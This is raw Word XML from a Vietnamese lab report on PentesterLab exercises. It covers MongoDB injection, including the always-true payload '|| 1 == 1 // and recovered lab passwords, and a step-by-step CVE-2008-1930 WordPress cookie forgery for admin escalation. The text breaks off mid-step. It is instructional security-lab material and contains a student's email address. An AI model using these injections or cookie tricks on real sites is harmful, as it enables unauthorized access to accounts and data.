        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="3BD42A6D">
          <v:shape id="Hình ảnh 151" o:spid="_x0000_i1182" type="#_x0000_t75" style="width:468pt;height:213.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId173" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E64FC6F" w14:textId="135CC554" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bằng cách sử dụng đoạn code như hình trên tôi nhận được mật khẩu là:</w:t>
      </w:r>
      <w:r w:rsidR="00AC658F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00074AEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>sgulws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tiến hành đăng nhập vào website ta được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4334FD26" w14:textId="4C0A1C4F" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6BEF07C6">
          <v:shape id="Hình ảnh 152" o:spid="_x0000_i1183" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId174" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E077F0" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00791765" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00791765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>G.MONGODB</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00791765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586629EC"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MongoDB là cơ sở dữ liệu NoSQL, vẫn có thể viết mã dễ bị tấn công và do đó bài tập này có hai NoSQL-injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6263269D"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Để có thể thực hiện được các bài tập dưới đây bạn cần nắm một số kiến thức sao:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CD33BF"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ìm hiểu và hiểu cú pháp MongoDB trông như thế nào (tìm trang web của dự án và đọc tài liệu).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B46F0A4"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ìm những gì có thể được sử dụng để loại bỏ mã sau điểm tiêm của bạn (nhận xét, byte trống).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A9DA4"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ìm cách bạn có thể tạo điều kiện luôn đúng (ví dụ 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2097662A" w14:textId="61494AE4"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ìm cách bạn có thể truy xuất thông tin (ví dụ 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B370DC8"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Example 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A189829"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Đây là một ví dụ cơ bản của việc tiêm sql, bạn chỉ cần tạo một câu lệnh sự thật, tìm một ký tự thoát và viết mã vào hộp văn bản 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9222F3"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rong sql injection, chúng ta đã sử dụng 'hoặc 1 = 1 # ở đây cú pháp thay đổi một chút, dấu = được đổi thành ==, hoặc được đổi thành || và # đến // tạo đoạn mã sau: '|| 1 == 1 /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC658F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6D53BE1C"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iến hành đăng nhập câu lệnh trên vào trong website và gửi truy vấn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B11F59" w14:textId="271614DE" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="60F4B6CF">
          <v:shape id="Hình ảnh 153" o:spid="_x0000_i1184" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId175" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C77D1" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau khi câu lệnh thực thi ta được kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075D68A4" w14:textId="74BE2A1A"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7714D1B6">
          <v:shape id="Hình ảnh 155" o:spid="_x0000_i1185" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId176" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25841BA5" w14:textId="77777777"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Example 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58254808" w14:textId="53CAF8A6" w:rsid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Ở ví dụ 2,</w:t>
      </w:r>
      <w:r w:rsidR="00AC658F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>đề bài yêu cầu ta tìm password của admin trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782318EF" w14:textId="3B4B687F" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="38BC1D0B">
          <v:shape id="Hình ảnh 157" o:spid="_x0000_i1186" type="#_x0000_t75" style="width:467.25pt;height:92.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId177" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7580911E" w14:textId="560EB6E9"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ôi sử dụng python cùng vơi đoạn code như hình trên,</w:t>
      </w:r>
      <w:r w:rsidR="00481377">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC658F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tôi đặt tên cho nó là Mongo2.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604C1552" w14:textId="411ECF9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Tiến hành vào Command,</w:t>
      </w:r>
      <w:r w:rsidR="00481377">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC658F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gõ lệnh Window Power Shell,</w:t>
      </w:r>
      <w:r w:rsidR="00481377">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC658F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>thực thi đến đường dẫn chứa file này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DADA81" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00AC658F" w:rsidRDefault="004653AE" w:rsidP="00AC658F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC658F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng câu lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC658F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python Mongo2.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC658F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.Ta được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FD8066" w14:textId="126A2784" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="27C02C24">
          <v:shape id="Hình ảnh 156" o:spid="_x0000_i1187" type="#_x0000_t75" style="width:468pt;height:229.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId178" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCBE501" w14:textId="7D4F5CC7" w:rsidR="004653AE" w:rsidRPr="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta được mật khẩu của admin là: </w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>azpassw0rd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D505471" w14:textId="0967B964" w:rsidR="00425DDD"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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00947A77" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2008-1930: Wordpress 2.5 Cookie Integrity Protection Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D1165F" w14:textId="0802A009" w:rsidR="00A70F8A" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.Giới thiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FF4D78" w14:textId="1C20C3F1" w:rsidR="007C7257" w:rsidRPr="007C7257" w:rsidRDefault="007C7257" w:rsidP="007C7257">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C7257">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Link bài lab: </w:t>
      </w:r>
      <w:hyperlink r:id="rId179" w:history="1">
        <w:r w:rsidRPr="00AF083F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://pentesterlab.com/exercises/cve-2008-1930/course?fbclid=IwAR2AHY4xWlP0Kc1ia9bBecmfTgUCDktg2vY2Vg-1inHSHVozJd8SIp_w6kI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B0E0C3" w14:textId="391B511D" w:rsidR="00947A77" w:rsidRPr="00F12C2B" w:rsidRDefault="00947A77" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bài tập này giải thích cho chúng ta cách có thể khai thác lỗi CVE-2008-1930 để có thể lấy được quyền truy cập vào giao diện cài đặt thuộc quyền quản trị viên trong Wordpress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68039076" w14:textId="59375F8C" w:rsidR="00F84462" w:rsidRPr="00F12C2B" w:rsidRDefault="00F84462" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Các lỗi này được phát hiện vào năm 2008 và cho phép kẻ tấn công có được quyền truy cập của quản trị viên vào một</w:t>
      </w:r>
      <w:r w:rsidR="00665C29" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> trang web thuộc</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> phiên bản wordpress nếu</w:t>
      </w:r>
      <w:r w:rsidR="00665C29" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> như</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> có chức năng đăng ký người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A5C2C7" w14:textId="1D57B35D" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C76843" w14:textId="620A6F84"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47CEC28D">
          <v:shape id="_x0000_i1188" type="#_x0000_t75" style="width:468pt;height:136.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId180" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF7A510"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Đây là trang web của Wordpress thao trường để chúng ta bắt đầu tấn công qua lỗ hổng cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03841EAC"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Bước 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E996760"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Chúng ta sẽ nhấp vào đăng ký Register.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1FC53C" w14:textId="4C773DC6"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4D8D9AC4">
          <v:shape id="_x0000_i1189" type="#_x0000_t75" style="width:468pt;height:132pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId181" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DE7647"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Tạo một tài khoản:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086C2F5A" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Username: admin1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396153F5" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Password: pentesterlab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DEA3AF"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Trước khi vào bước tiếp theo chúng ta hay nhìn cách mà trang web này mã hóa cookie của username và password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293A6DEE" w14:textId="2A0B8D62"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1E868791">
          <v:shape id="_x0000_i1190" type="#_x0000_t75" style="width:468pt;height:69pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId182" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="419818E1"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Đây được xem là 1 ví dụ mã hóa cookie usernam và password của Wordpress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FF4C47" w14:textId="1D662164"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Chúng ta thấy người dùng admin1 chỉ là 1 user bình thường nhưng mật khẩu và username được mã hóa rất giống nhau, chỉ khác nhau ở chỗ số 1 của admin1 nằm ngay bên username còn admin thì phần expiration lại dư 1 số 1 ở phía trước,</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>đây chính là vấn đề!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171DFFC9" w14:textId="70B54A1D"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6D946360">
          <v:shape id="_x0000_i1191" type="#_x0000_t75" style="width:467.25pt;height:136.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId183" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EA7A24"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 xml:space="preserve">Ta sẽ đăng ký: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625CA9CB"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Username: admin1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EAAE2F"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 xml:space="preserve">Email: </w:t>
      </w:r>
      <w:hyperlink r:id="rId184" w:history="1">
        <w:r w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>tranlethienphuc99@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="212907F5"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Và trang web sẽ gửi mật khẩu về địa chỉ email mà chúng ta đăng ký.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E231566" w14:textId="721BC082" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Nhưng chúng ta yên tâm,</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">trang wordpress sẽ cung cấp cho mỗi username có một password tuyệt đối đó là </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>pentesterlab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F8CA43"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Bước 2 sẽ đăng nhập vào hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D744EDE" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Username: admin1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72029561" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Password: pentesterlab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68299875" w14:textId="38D29B6B"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3DAD34E2">
          <v:shape id="_x0000_i1192" type="#_x0000_t75" style="width:468pt;height:237pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId185" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECAA1D7"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Đây là trang web của một người dùng bình thường có tên là admin1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAF66B5"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Bây giờ đến lúc ta nâng cấp thành một tài khoản admin chính thức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A04110A"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Bước 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590E5398"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Ta bật f12 mở chế độ develop vào phần application rồi đến tiếp phần cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A9D972" w14:textId="31654D3D"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62B413B7">
          <v:shape id="_x0000_i1193" type="#_x0000_t75" style="width:468pt;height:121.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId186" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30079B1E"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 xml:space="preserve">Như t thấy ở ví dụ phía trên thì </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>admin1%7C…</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
